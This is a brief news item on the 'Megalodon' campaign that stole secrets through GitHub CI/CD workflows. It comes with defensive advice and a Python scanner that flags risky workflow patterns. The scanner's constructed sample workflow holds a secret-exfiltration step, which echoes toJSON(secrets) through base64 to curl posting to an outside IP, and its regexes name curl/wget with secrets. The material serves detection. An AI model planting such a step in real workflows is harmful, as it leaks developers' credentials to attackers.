The "Megalodon" malware campaign has infected over 5,500 GitHub repositories within a six-hour timeframe, exploiting CI/CD workflows to steal sensitive credentials and developer secrets. Cybersecurity experts suspect the attackers utilized stolen credentials from previous breaches, and while similarities to the threat group TeamPCP exist, no direct links have been confirmed.
The Megalodon campaign highlights significant weaknesses in the software supply chain, particularly where GitHub repositories and their CI/CD workflows are trusted implicitly. Defenders should audit their GitHub repositories for malicious workflow files and unauthorized changes, rotate all credentials, SSH keys, and API keys on a regular schedule, and revoke them immediately if suspicious activity is detected. Additionally, blocking connections to known command-and-control servers associated with Megalodon can mitigate further risk.
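One way to carry out the workflow audit recommended above, as an added example that is not from the original report or from any tool it names: a small Python scanner that walks `.github/workflows/` and flags generic risk indicators in GitHub Actions workflow files (whole-secret-store serialisation, network clients on the same line as a secret reference, encoding inside run steps, untrusted pull-request code checked out under a privileged trigger, and actions pinned to mutable tags instead of full commit SHAs). The indicator patterns, both sample workflows, the 40-character SHA and the RFC 5737 documentation address are constructed assumptions for illustration, not Megalodon indicators of compromise.

```python
"""Audit GitHub Actions workflow files for common secret-exfiltration and weak-pinning
indicators. Added example; the patterns are generic heuristics (assumption), not
indicators of compromise tied to any specific campaign."""
import re
import sys
from pathlib import Path
from typing import Dict, List

# Indicator name, regex, and the reason a reviewer should care.
INDICATORS = [
    ("secrets-dump", re.compile(r"toJSON\(\s*secrets\s*\)"),
     "serialises the entire secret store into the job environment or log"),
    ("network-tool-with-secrets",
     re.compile(r"(?=.*\b(?:curl|wget)\b)(?=.*\bsecrets\b)"),
     "network client and a secret reference on the same line"),
    ("encoding-in-run", re.compile(r"\b(?:base64|xxd|gzip)\b"),
     "encoding inside a run step is a common way to slip past log masking"),
]
PR_HEAD_RE = re.compile(r"github\.event\.pull_request\.head\.(?:sha|ref)")
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s@]+)@(\S+)")
SHA40_RE = re.compile(r"^[0-9a-f]{40}$")


def audit_workflow(text: str) -> List[Dict[str, object]]:
    """Return one finding per (line, indicator) hit in a single workflow file."""
    findings: List[Dict[str, object]] = []
    # Head-ref checkout is only dangerous under a privileged trigger.
    has_prt = "pull_request_target" in text
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern, why in INDICATORS:
            if pattern.search(line):
                findings.append({"line": lineno, "indicator": name,
                                 "why": why, "text": line.strip()})
        if has_prt and PR_HEAD_RE.search(line):
            findings.append({"line": lineno, "indicator": "pr-target-head-checkout",
                             "why": "untrusted PR code checked out under pull_request_target",
                             "text": line.strip()})
        m = USES_RE.search(line)
        if m:
            action, ref = m.group(1), m.group(2)
            # Local and docker:// actions are not pinned by commit SHA.
            if not action.startswith(("./", "docker://")) and not SHA40_RE.match(ref):
                findings.append({"line": lineno, "indicator": "unpinned-action",
                                 "why": f"{action} pinned to mutable ref {ref!r}, not a commit SHA",
                                 "text": line.strip()})
    return findings


def audit_directory(repo_root: str) -> Dict[str, List[Dict[str, object]]]:
    """Audit every workflow file under <repo_root>/.github/workflows."""
    results: Dict[str, List[Dict[str, object]]] = {}
    for path in Path(repo_root, ".github", "workflows").glob("*.y*ml"):
        hits = audit_workflow(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            results[str(path)] = hits
    return results


# Constructed sample: a workflow with an injected secret-stealing step.
SAMPLE_WORKFLOW = """\
name: CI
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - run: npm ci
      - run: |
          echo '${{ toJSON(secrets) }}' | base64 -w0 | curl -sS -X POST --data-binary @- http://203.0.113.10/collect
"""

# Constructed sample: privileged trigger checking out the PR's own head.
SAMPLE_PR_TARGET = """\
on: pull_request_target
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm install && npm test
"""

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    report = audit_directory(root) if len(sys.argv) > 1 else {"<sample>": audit_workflow(SAMPLE_WORKFLOW)}
    for path, hits in report.items():
        for h in hits:
            print(f"{path}:{h['line']}: [{h['indicator']}] {h['why']}\n    {h['text']}")
```

Run it with a repository path to scan real workflow files, or with no arguments to see the findings on the constructed sample. A hit is a prompt for human review rather than proof of compromise: the same step that dumps `toJSON(secrets)` to an external host would also be flagged, with line numbers, in a diff review, which is the place to catch an unauthorized workflow change before it runs.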